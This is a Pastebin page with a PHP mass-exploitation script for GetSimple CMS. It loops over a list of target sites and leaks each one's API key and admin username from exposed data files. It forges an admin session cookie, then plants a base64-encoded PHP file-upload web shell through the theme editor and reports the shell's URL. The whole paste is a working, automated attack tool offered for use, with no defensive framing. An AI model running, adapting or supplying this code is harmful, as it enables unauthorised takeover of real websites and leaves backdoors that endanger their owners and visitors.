API tools faq
paste
ToKeiChun

GetSimple CMS RCE Auto Exploit

ToKeiChun
Jun 8th, 2019 (edited)
255
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 4.59 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /**
  3. * @author Con7ext <kreonrinto@gmail.com>
  4. * GetCMS Mass Exploiter
  5. **/
  6. class getCMS{
  7.   public $url;
  8.   public $user;
  9.   public $cookie;
  10.   public $headers;
  11.   public $apikey;
  12.   public $version;
  13.   public $shell;
  14.   public $payload;
  15.   public function __construct($url){
  16.     $this->url = $url;
  17.     $this->user = null;
  18.     $this->cookie = null;
  19.     $this->apikey = null;
  20.     $this->version = null;
  21.     $this->headers = null;
  22.     $this->shell = "0x0x0.php";
  23.     $this->payload = base64_decode("PD9waHAgaWYoaXNzZXQoJF9GSUxFU1snZiddWyduYW1lJ10pKXskbmFtZSA9ICRfRklMRVNbJ2YnXVsnbmFtZSddOyRuMiA9ICRfRklMRVNbJ2YnXVsndG1wX25hbWUnXTtAbW92ZV91cGxvYWRlZF9maWxlKCRuMiwgJG5hbWUpOyBlY2hvICRuYW1lO31lbHNleyBlY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSc+Pj4nPiI7fSA/Pg==");
  24.   }
  25.   public function makeRequest($url, $post = null, $header = null){
  26.     $ch = curl_init();
  27.     curl_setopt($ch, CURLOPT_URL, $url);
  28.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  29.     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  30.     curl_setopt($ch, CURLOPT_MAXREDIRS, 10);
  31.     if($header && !empty($header)){
  32.       curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
  33.     }
  34.     if($post && !empty($post)){
  35.       curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  36.     }
  37.     $re = curl_exec($ch);
  38.     $http = curl_getinfo($ch, CURLINFO_HTTP_CODE);
  39.     curl_close($ch);
  40.     return [
  41.       "head" => $http,
  42.       "body" => $re
  43.     ];
  44.   }
  45.   public function genHeader(){
  46.     $this->headers = array("Cookie: ".$this->cookie);
  47.   }
  48.   public function genCookie(){
  49.     $this->cookie = "GS_ADMIN_USERNAME=".$this->user.";".$this->CookieName()."=".$this->CookieValue();
  50.     $this->genHeader();
  51.   }
  52.   public function CookieName(){
  53.     $cname = "getsimple_cookie_".$this->version.$this->apikey;
  54.     $sh = sha1($cname);
  55.     return $sh;
  56.   }
  57.   public function CookieValue(){
  58.     $cvalue = $this->user.$this->apikey;
  59.     $sh = sha1($cvalue);
  60.     return $sh;
  61.   }
  62.   public function version(){
  63.     $meh = $this->makeRequest($this->url."/admin");
  64.     preg_match_all("|src=\"template/js/jquery.getsimple.js\?v=(.*?)\">|", $meh["body"], $vers);
  65.     if(!empty($vers[1][0])){
  66.       $this->version = str_replace(".", "", $vers[1][0]);
  67.       return true;
  68.     }
  69.     else{
  70.       echo "\033[0;31mI can't find Version ;D\n";
  71.       return false;
  72.     }
  73.   }
  74.   public function getApikey(){
  75.     $meh = $this->makeRequest($this->url."/data/other/authorization.xml");
  76.     preg_match_all("|<apikey><\!\[CDATA\[(.*?)\]\]></apikey>|", $meh["body"], $vers);
  77.     if(!empty($vers[1][0])){
  78.       $this->apikey = $vers[1][0];
  79.       return true;
  80.     }
  81.     else{
  82.       echo "\033[0;31mI can't get apikey :D\n";
  83.       return false;
  84.     }
  85.   }
  86.   public function getUser(){
  87.     $meh = $this->makeRequest($this->url."/data/users/");
  88.     if($meh["head"] == 200){
  89.       preg_match_all("|<a href=\"(.*?).xml\">|", $meh["body"], $vers);
  90.       if(!empty($vers[1][0])){
  91.         $this->user = $vers[1][0];
  92.         return true;
  93.       }
  94.       else{
  95.         $this->user = "admin";
  96.         return true;
  97.       }
  98.     }
  99.     else{
  100.       $this->user = "admin";
  101.     }
  102.   }
  103.   public function getNonce(){
  104.     $req = $this->makeRequest($this->url."/admin/theme-edit.php", null, $this->headers);
  105.     preg_match_all("|nonce\" type=\"hidden\" value=\"(.*)\"|", $req["body"], $vers);
  106.     if(!empty($vers[1][0])){
  107.      return $vers[1][0];
  108.     }
  109.     else{
  110.       echo "\033[0;31mi can't find nonce :D\n";
  111.     }
  112.   }
  113.   public function upload(){
  114.     $n = $this->getNonce();
  115.     $data = array(
  116.       "submitsave" => "2",
  117.       "edited_file" => $this->shell,
  118.       "content" => $this->payload,
  119.       "nonce" => $n);
  120.     $req = $this->makeRequest($this->url."/admin/theme-edit.php", $data, $this->headers);
  121.     if(!preg_match("|CSRF detected|", $req["body"])){
  122.       echo "\033[0;32mSuccess -> ".$this->url."/theme/".$this->shell."\n";
  123.     }
  124.     else{
  125.       echo "\033[0;31mFailed\n";
  126.     }
  127.   }
  128.   public function exploit(){
  129.     echo "\n\033[1;37m[+] ".$this->url." [+]\n";
  130.     echo "\033[0;34m[+]Getting Version\n";
  131.     if($this->version()){
  132.       echo "[+]\033[0;34mGetting Apikey\n";
  133.       if($this->getApikey()){
  134.         echo "[+]\033[0;34mGetting User\n";
  135.         if($this->getUser()){
  136.           $this->genCookie();
  137.           echo "[+]\033[0;34mUploading Shell\n";
  138.           $this->upload();
  139.         }
  140.       }
  141.     }
  142.   }
  143. }
  144. $list = $argv[1];
  145. $mek = file_get_contents($list);
  146. $mes = explode("\n", $mek);
  147. foreach($mes as $site){
  148.   $t = new getCMS($site);
  149.   $t->exploit();
  150. }
  151. echo "\033[1;37m";
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!